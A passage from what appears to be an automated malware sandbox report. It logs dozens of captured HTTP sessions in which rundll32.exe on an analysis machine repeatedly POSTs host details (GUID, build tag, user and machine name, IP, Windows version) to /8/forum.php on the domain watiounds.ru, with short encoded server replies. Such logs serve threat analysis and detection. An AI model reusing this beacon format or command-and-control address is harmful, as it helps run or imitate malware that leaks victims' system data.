                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:38.388016939 CEST72INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          330192.168.2.224949595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:54.314910889 CEST404OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:54.445449114 CEST405INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          331192.168.2.224949695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:54.771280050 CEST405OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:54.917239904 CEST406INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          332192.168.2.224949795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:55.234579086 CEST406OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:55.359719992 CEST407INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          333192.168.2.224949895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:55.684708118 CEST408OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:55.811392069 CEST408INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJHSQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          334192.168.2.224949995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:56.137103081 CEST409OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:56.260298967 CEST409INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          335192.168.2.224950095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:56.577138901 CEST410OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:56.700835943 CEST410INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          336192.168.2.224950195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:57.032484055 CEST411OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:57.159640074 CEST411INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          337192.168.2.224950295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:57.477037907 CEST412OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:57.604276896 CEST412INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYAZBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          338192.168.2.224950395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:57.930341959 CEST413OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.052639008 CEST414INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          339192.168.2.224950495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:58.369174957 CEST414OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.493335962 CEST415INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          34192.168.2.224919995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:38.714252949 CEST73OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:38.843950033 CEST73INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          340192.168.2.224950595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:58.818528891 CEST416OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.943658113 CEST416INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          341192.168.2.224950695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:59.257772923 CEST417OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:59.383683920 CEST417INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNQJMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          342192.168.2.224950795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:59.711113930 CEST418OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:59.834989071 CEST418INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          343192.168.2.224950895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:00.169342995 CEST419OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:00.297617912 CEST419INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          344192.168.2.224950995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:00.624250889 CEST420OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:00.752571106 CEST420INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cATGZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          345192.168.2.224951095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:01.062952042 CEST421OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:01.191457033 CEST421INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQNMJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          346192.168.2.224951195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:01.523696899 CEST422OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
